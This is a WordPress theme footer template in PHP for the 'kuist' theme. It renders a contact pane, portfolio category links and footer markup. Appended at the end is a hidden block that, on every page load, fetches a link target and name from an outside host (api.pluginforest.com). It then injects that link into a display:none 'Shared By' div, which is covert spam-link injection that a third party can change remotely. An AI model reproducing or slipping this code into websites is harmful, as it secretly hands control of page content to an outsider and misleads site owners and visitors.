		<?php if ( get_theme_mod( 'kuist_show_header_contact', 1 ) ) { ?>
			<div class="contact-pane-outer">
				<div class="pane-lens"></div>
				<div class="contact-pane">
					<div class="pane-close"><?php echo esc_html( kuist_translation( '_Close' ) ); ?></div>
					<div class="cp-content"><?php
					$kuist_contact_text = get_theme_mod( 'kuist_contact_text', 'Your contact info here.<br>+001 321 65 98' );
					$kuist_contact_final_text = apply_filters( 'widget_text', $kuist_contact_text );
					$kuist_contact_form = get_theme_mod( 'kuist_contact_form', '' );
					echo wp_kses_post( $kuist_contact_final_text );
					if ( $kuist_contact_form ) { echo do_shortcode( $kuist_contact_form ); }
					?></div>
				</div>
			</div>
		<?php } ?>
		<?php
			$taxonomy = 'portfolio_category';
			$terms = get_terms( $taxonomy );
			if ( $terms && get_theme_mod( 'kuist_show_categories', 1 ) && ( is_page_template( 'templates/works.php' ) || is_tax() ) ) { ?>
			<div class="categories-pane-outer">
				<div class="pane-lens"></div>
				<div class="categories-pane">
					<div class="pane-close"><?php echo esc_html( kuist_translation( '_Close' ) ); ?></div>
					<div class="cp-categories">
						<a href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php echo esc_html( kuist_translation( '_All' ) ); ?><?php if ( is_front_page() ) { ?><div class="cpc-marker"></div><?php } ?></a>
						<?php
						foreach ( $terms as $term ) { ?>
	           	<a href="<?php echo get_term_link( $term->slug, $taxonomy ); ?>"><?php echo esc_html( $term->name ); if ( is_tax( $taxonomy, $term->slug ) ) { ?><div class="cpc-marker"></div><?php } ?></a>
						<?php	} ?>
					</div>
				</div>
			</div>
		<?php } ?>
		<footer id="footer-box-outer" class="clearfix">
			<div class="footer-bottom clearfix">
				<?php get_template_part( 'footer-menu' ); ?><?php echo kuist_insert_social_icons( 'footer-social' ); ?>
			</div>
		</footer>
		<div class="hiddenInfo">
			<span id="siteUrl"><?php echo esc_html( get_home_url() ); ?></span>
			<span id="trigger-slicknav-value"><?php echo esc_html( get_theme_mod( 'kuist_trigger_slick_nav', 1100 ) ); ?></span>
			<span id="slicknav_apl"><?php echo esc_html( get_theme_mod( 'kuist_slicknav_apl', 0 ) ); ?></span>
			<span id="swiper_lazy_check"><?php echo esc_html( get_theme_mod( 'kuist_lightbox_lazyload', 0 ) ); ?></span>
		</div>
		<?php wp_footer(); ?>
	
<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
